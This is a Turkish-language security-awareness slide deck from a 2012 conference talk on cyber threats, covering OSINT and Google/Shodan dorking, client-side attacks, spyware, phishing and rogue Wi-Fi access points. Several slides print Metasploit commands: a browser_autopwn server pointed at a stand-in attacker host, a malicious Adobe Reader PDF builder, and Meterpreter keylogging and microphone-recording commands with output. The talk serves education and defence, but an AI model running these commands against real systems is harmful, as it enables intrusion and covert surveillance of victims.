Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü...

64
Yeni Dünya Düzeninde Siber Saldırılar ve Güncel Siber Tehditler Ozan UÇAR [email protected] Boğaziçi Compec, EXIT 2012 İstanbul

Transcript of Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü...

Page 1: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Yeni Dünya Düzeninde Siber Saldırılar ve

Güncel Siber Tehditler

Ozan UÇAR

[email protected]

Boğaziçi Compec, EXIT 2012 İstanbul

Page 2: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Konuşmacı Hakkında

• Bilgi Güvenliği Uzmanı ve Eğitmen

– Bilgi Güvenliği AKADEMİSİ (www.bga.com.tr)

• Penetration Tester

• Blog Yazarı

– www.cehturkiye.com

– blog.bga.com.tr

• İletişim

– Skype: ozan.ucar

– Eposta: [email protected]

www.bga.com.tr 2

Page 3: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Genel Konu Başlıkları

• Yeni Dünya Düzeninde Siber Güvenliğin Rolü

• Siber Tehditler

• Siber İstihbarat Toplama Yöntemleri

• İstemci Tabanlı Saldırı Türleri

• Başarılı Bir Saldırı Sonrası Olası Tehditler

• Casus Yazılım Tehlikeleri

• Kablosuz Ağlara Yönelik Saldırılar

www.bga.com.tr 3

Page 4: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Bilgilendirme

• Bu sunumdaki tüm ekran görüntüleri internet üzerindeki açık kaynaklardan elde edilmiştir.

www.bga.com.tr 4

Page 5: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Hacking Kültürü Hakkında

Bilgisayar yer altı dünyası bir aynalı salondur. Gerçekler bükülür, doğrular küçülür.

www.bga.com.tr 5

Page 6: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Genel Terim ve Kavramlar

Siber savaş(cyber warfare), siber tehditler, siber suç(cyber crime), cyber espionage, cyber intelligence, siber sabotaj(cyber sabotage), siber terörizm (Cyberterrorism), siber casusluk (Cyber spying), siber silah (cyber o weapon), sızma testleri (penetration test), siber güvenlik yarışmaları(CTF -Capture The Flag)

Page 7: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Yeni Dünya Düzeninde Siber Güvenlik

Page 8: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Firmalara Etkileri

• Sanayi casusluğu

• Prestij kaybı

• Maddi kayıplar

• İnternek kaynaklarını servis dışı bırakma (DDOS)

• Sahte belge

Page 9: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

RSA

Page 10: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

RSA Detay

Page 11: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

15 Yaşında, Gerçek Bir Tehdit…

Page 12: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

ISP’nin DDoS’a Cevabı

Page 13: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Botnet Satın Alma

Page 14: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Operation Digiturk

http://anonnews.org/press/item/1351/

Page 15: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Siber Şantaj

Page 16: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

SONY

Page 17: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Açık Kaynak İstihbarat Toplama Yöntemleri

• OSINT, Internet kaynakları kullanarak hedef sistem/kişiler hakkında bilgi toplama ve bu bilgileri hedef sistem/kişi hakkında değer ifadece edecek formata dönüştürme.

• Temelde iki bölümden oluşur:

– Görünen açık kaynaklardan bilgi toplama

– Genele açık olmayan forumlar/IRC odaları kullanarak bilgi toplama

Page 18: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Bilgi Toplama

• Hackerların sistemlere saldırmadan önce internet üzerinden nasıl bilgi edindikleri, bu bilgilerin nerelerde kullanıldığının anlaşılması.

• Sistemli çalışan bir hacker herşeyden önce istihbarat toplama işlemi/keşif)yapar.

Page 19: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Bilgi Toplama Yöntemleri

• Amaç hedef sistem hakkında olabildiğince çok bilgi toplamaktır.

• Bilgi toplama;

– Hedef sistemle doğrudan iletişime geçerek

– Hedef sistemden bağımsız olmak üzere iki türdür.

• Bilgi toplama yöntemleri

– Pasif bilgi toplama

– Aktif bilgi toplama

Page 20: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Arama Motorlarından Bilgi Toplama

• Arama motoru != Google

• Google haricinde özellştirilmiş arama motorları da vardır

• ShodanHQ – Pentesterlar için

• Pipl.com kişiler hakkında toplu bilgi edinme amaçlı

Page 21: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Pipl.com Aracılığı ile Şahıs Arama

• Pipl.com kiş arama için en ideal sonuçları bulan bir arama motorudur

Page 22: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Shodan

• Değişik bir arama motoru:Shodanhq.com

• Tamamen güvenlik testleri yapanlara yönelik geliştirilmiş bir sistem mantığıyla çalışır – Internete açık sistemlerde default bırakılmış

parolaları bulma

• SHODAN, filtreler kullanarak çeşitli bilgisayar tabanlı sistemleri (desktop, switch, router, servers vb.) bulmayı sağlayan bir arama motorudur

Page 23: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Shodan Örnek

Page 24: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

“default password”

Page 25: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

net:1.1.1.1/24

Page 26: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

“cisco-ios” “last-modified” country:TR

Page 27: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Google Aracılığıyla Bilgi Toplama

• Google üzerinden “gelişmiş” arama yapmak için çeşitli teknikler bulunmaktadır.

• Bu tekniklere GoogleHacking adı verilir. – Bu teknikler çeşitli özel kelimelerden oluşur ve genelde akılda

kalmaz

• Efektif arama yapabilmek için bu kelimeleri ezberlemek yerine – Bu özel kelimeleri barındıran çeşitli programlar kullanılabilir

• Bu programlardan en kullanışlı olanı GoolagScanner’dir. • Alternatif olarak Google Hacking terimini bize kazandıran

GHD(google hacking database) kullanılabilir

Page 28: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Google Arama İpuçları

• Site:www.google.com – Sadece google.com için arama yapar

• Allintitle:Security admin – Title’inda security ve admin geçenleri arar

• İnurl:test deneme – url’de test geri kalan kısımlarda deneme içeren

sonuçlar

• Allinurl:google test – Url de google ve test içeren sonuçlar

Page 29: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Google Hacking Database (GHDB)

http://www.exploit-db.com/google-dorks/

Page 30: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Google’dan Hesap Bilgileri

Page 31: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Örnek:.bash_history

http://www.southerndivasecrets.com/.bash_history Uygulama

Page 32: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Türkiye’den Örnekler

Page 33: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Siber Savaşın Devletlere Etkileri

• Ülkeleri sarsan siber savaşlar

• Çağın en tehlikeli siber silahları: Stuxnet, Duqu

• Ddos saldırıları

• Hactivist aktiviter

• Veri sızdırma girişimleri

• Ajan yazılımlar

• ….

Page 34: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

LULZSEC

• Ekip kimlerden oluşuyor ?

• Operasyonları ticari mi politik mi ?

• Özgürlük savaşçıları mı ?

• Ellerinde, kimlere ait ne kadar

veri var ?

http://twitter.com/#!/LulzSec

Page 35: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

ANONYMOUS

Page 36: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

STUXNET & DUQU

Page 37: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

BTK Veritabanı Sızdırıldı

Page 38: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Siber Suçlardan İlk İstifa

Page 39: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Türkiye’nin Kimlik Haritası..

Page 40: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Son Kullanıcıya Yönelik Saldırılar

• Kişisel veriler

• Banka bilgileri

• Eposta hesapları

• MSN/Skype yazışmaları

• Gizli webcam görüntüleri

• Ortam dinleme

• Facebook, Twitter hesapları

• ….

www.bga.com.tr 40

Page 41: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

1.200.000 Kişinin Hassas Bilgileri Internet’te

Page 42: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

İstemci Tabanlı Saldırı Türleri

• Browser (İnternet Tarayıcılar)

• Eposta Yazılımları

• PDF Okuyucular

• Office Yazılımları

• XSS Saldırıları

• Java Uygulamaları

• Media Player

• Casus Yazılımlar

• Sosyal Mühendislik www.bga.com.tr 42

Page 43: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Saldırı Sonrası Olası Tehditler

• Keylogger Kurulumu

– Klavye girişlerinin dinlenmesi

• Webcam Casusu

– Gizli video kaydı, fotoğraf çekimi

• Ortam Dinleme

– Ses kaydı

• Veri Sızdırma

– Kayıtlı parolalar, önemli ofis dosyaları vb.

• Bilgisayarı Köleleştirme

– Botnet ordusuna katılma, DDOS saldırılarında bulunma

www.bga.com.tr 43

Page 44: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

İstemci Bilgisayarlar Nasıl Korunuyor ?

• Antivirüs Yazılımları

– Antivirus motorları

– İmza tabanlı & Sezgisel

– Bypass teknikleri

• Kişisel Firewall Yazılımları

– Atlatma senaryoları ...

• Bilinç

– Farkındalık ve eğitimin

www.bga.com.tr 44

Page 45: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Tanınmaz Meterpreter Ajanı

www.bga.com.tr 45

Page 46: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Antivirus Test

Tarama Sonucu:

http://goo.gl/2M1wy

www.bga.com.tr 46

Page 47: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Meterpreter | Keylogger

www.bga.com.tr 47

Keylogger olarak kullanımı;

> keyscan_start

> keyscan_dump

Hedefin ekran görüntüsünü ele geçirme

> screeshot

Page 48: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Meterpreter | Webcam Casusu

www.bga.com.tr 48

Webcam görüntüsünü ele geçirmek

Webcam canlı video görüntüsünü almak

Page 49: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Meterpreter | Ortam Dinleme

www.bga.com.tr 49

Kurban sistemde bir mikrofon varsa, ortam dinlemesi yapılabilir.

// 25. sn boyunca dinleme yap ve kaydet.

record_mic -d 25

[*] Starting...

[*] Stopped

Audio saved to: /opt/metasploit3/msf3/nFqYscte.wav

Page 50: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Ajan Marmara (Sanal Klavye Ajanı)

www.bga.com.tr 50

Page 51: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Web İnjection

www.bga.com.tr 51

Video

Page 52: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Browser Tabanlı Açıklıklar

• Bir browser exploiti, kötü amaçlı geliştirilmiş zararlı kod parçasıdır.

• Kullanıcının bilgisi olmadan, bilgisayarına zararlı yazılım bulaştırmak veya izinsiz/yetkisiz değişikliklerde bulunmak için kullanılır.

• Zararlı kod; HTML, Image, Java, Javascript, ActiveX veya başka bir web teknolojisi olabilir.

• Zayıflıklar, browser teknolojisinden veya eklentilerinden kaynaklanabilir.

www.bga.com.tr 52

Page 53: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Browser Tabanlı Açıklıklar | Uygulama

• Browser Autopwn ile otomotik browser exploit msf > use auxiliary/server/browser_autopwn

msf auxiliary(browser_autopwn) > set LHOST saldirgan.com

LHOST => 85.95.238.172

msf auxiliary(browser_autopwn) > set SRVPORT 80

SRVPORT => 80

msf auxiliary(browser_autopwn) > set URIPATH /giris

URIPATH => /giris

msf auxiliary(browser_autopwn) > exploit

[*] --- Done, found 23 exploit modules

[*] Using URL: http://0.0.0.0:80/giris

[*] Local IP: http://saldirgan.com :80/giris

www.bga.com.tr 53

Page 54: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

PDF Okuyucular| Uygulama

PDF formatının popüler olması ile birlikte, PDF okuyucuların açıklıklarları etkili bir hacking malzemesi haline gelmiştir.

• Adobe Reader msf > use exploit/windows/fileformat/adobe_geticon

msf exploit(adobe_geticon) > set FILENAME belge.pdf

FILENAME => belge.pdf

msf exploit(adobe_geticon) > exploit

[*] Creating 'belge.pdf' file...

[+] belge.pdf stored at /var/www/belge.pdf

www.bga.com.tr 54

Page 55: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Sosyal Mühendislik Saldırıları

Teknik sorunlar teknik yollarla çözülür, insan tabanlı sorunlar insanla çözülür …

• Oltalama saldırıları

– facebook.com > facabook.com

• Bir web sitesinin bire bir benzerini (clone) oluşturmak

• Java Uygulamaları

• Sahte Kablosuz Ağlar

www.bga.com.tr 55

Page 56: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

En Zayıf Halka: İnsan

www.bga.com.tr 56

Page 57: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

SM | Oltalama Saldırıları

www.bga.com.tr 57

1

3 2

Page 58: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Sahte Eposta Gönderme

www.bga.com.tr 58

Page 59: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Sahte Eposta Gönderme

www.bga.com.tr 59

Page 60: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

SM | Web Clone & Java Applet

Social-Engineer Toolkit

www.bga.com.tr 60

Java uygulaması olarak casus yazılım bulaştırma

Page 61: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Sahte Kablosuz Erişim Noktaları

• Yalnızca amacı kötü olduğu için “sahte” olarak isimlendirilir, gerçeğinden ayırt edilemez

• Kablosuz ağ istemcileri, saldırgan tarafından yayın yapan kablosuz ağa dahil oldukdan sonra, tüm internet trafiği kaydedilir.

• DNS önbelleğini zehirleyerek sahte erişim sayfaları ile kimlik avı yapabilir.

www.bga.com.tr 61

Page 62: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Sahte Kablosuz Erişim Noktaları

www.bga.com.tr 62

Saldırı yapılan sistemden ekran görüntüsü

Page 63: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Sahte Kablosuz Erişim Noktaları

www.bga.com.tr 63

İnternete ilk girildiği anda, sahte bir güncelleme mesajı ile casus yazılım kurban bilgisayara yüklenir.

Page 64: Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü Hakkında Bilgisayar yer altı dünyası bir aynalı salondur. ... •Allinurl:google test

Teşekkürler